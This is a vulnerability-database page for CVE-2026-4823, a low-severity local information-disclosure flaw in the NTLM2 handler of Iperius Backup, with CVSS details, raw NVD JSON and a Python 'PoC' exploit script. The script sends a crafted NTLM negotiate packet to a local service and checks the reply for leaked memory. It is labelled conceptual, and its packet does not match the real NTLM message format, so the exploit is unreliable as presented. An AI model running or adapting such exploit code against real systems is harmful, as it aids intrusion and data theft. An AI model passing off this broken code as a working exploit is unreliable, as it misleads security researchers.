Security Vulnerability Report
中文
CVE-2026-4823 CVSS 2.5 LOW

CVE-2026-4823

Published: 2026-03-25 22:16:19
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A flaw has been found in Enter Software Iperius Backup up to 8.7.3. Affected by this vulnerability is an unknown functionality of the component NTLM2 Handler. Executing a manipulation can lead to information disclosure. The attack is restricted to local execution. Attacks of this nature are highly complex. The exploitation appears to be difficult. The exploit has been published and may be used. Upgrading to version 8.7.4 addresses this issue. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.

CVSS Details

CVSS Score
2.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Enter Software Iperius Backup <= 8.7.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-4823 (Local Information Disclosure) # This script is a conceptual demonstration of triggering the NTLM2 Handler flaw. # Note: Actual exploitation requires local access and specific environment conditions. import socket import struct import sys def send_malicious_ntlm_packet(target_ip, target_port): """ Sends a crafted packet to the local Iperius Backup service to trigger the information disclosure in NTLM2 Handler. """ try: print(f"[*] Connecting to {target_ip}:{target_port}...") # Establish a connection to the local vulnerable service sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) # Craft a malformed NTLM negotiation message # This payload is designed to trigger the buffer read overflow # leading to memory leak. payload = b"\x00" * 8 # Signature payload += b"\x01" * 4 # Message Type (Negotiate) payload += b"\xFF" * 4 # Flags (Malformed) payload += b"A" * 1024 # Padding to trigger read boundary issue print("[*] Sending malicious payload...") sock.sendall(payload) # Receive response response = sock.recv(4096) if response: print("[+] Response received:") print(response) # Check for leaked memory patterns (e.g., pointers, strings) if b"\x00\x00\x00\x00" in response or len(response) > 100: print("[!] Potential memory leak detected!") else: print("[-] No obvious leak detected in this attempt.") else: print("[-] No response from server.") sock.close() except Exception as e: print(f"[!] Error during exploitation: {e}") if __name__ == "__main__": # Target is localhost as this is a Local (AV:L) vulnerability TARGET_IP = "127.0.0.1" TARGET_PORT = 0000 # Replace with actual service port if known if len(sys.argv) > 1: TARGET_PORT = int(sys.argv[1]) else: print("Usage: python poc.py <port>") print("Attempting with default placeholder port...") send_malicious_ntlm_packet(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4823", "sourceIdentifier": "[email protected]", "published": "2026-03-25T22:16:19.280", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Enter Software Iperius Backup up to 8.7.3. Affected by this vulnerability is an unknown functionality of the component NTLM2 Handler. Executing a manipulation can lead to information disclosure. The attack is restricted to local execution. Attacks of this nature are highly complex. The exploitation appears to be difficult. The exploit has been published and may be used. Upgrading to version 8.7.4 addresses this issue. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product."}, {"lang": "es", "value": "Se ha encontrado una falla en Enter Software Iperius Backup hasta la versión 8.7.3. Afectada por esta vulnerabilidad es una funcionalidad desconocida del componente Gestor NTLM2. La ejecución de una manipulación puede llevar a la revelación de información. El ataque está restringido a la ejecución local. Los ataques de esta naturaleza son altamente complejos. La explotación parece ser difícil. El exploit ha sido publicado y puede ser utilizado. La actualización a la versión 8.7.4 soluciona este problema. Se aconseja actualizar el componente afectado. Se contactó al proveedor con antelación, respondió de manera muy profesional y rápidamente lanzó una versión corregida del producto afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 1.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/0truust/iperius-backup-security-advisories/blob/main/advisories/ntlm-relay-credential-exposure.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.353123", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.353123", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.774218", "source": "[email protected]"}, {"url": "https://www.iperiusbackup.com/download-software-backup.aspx", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.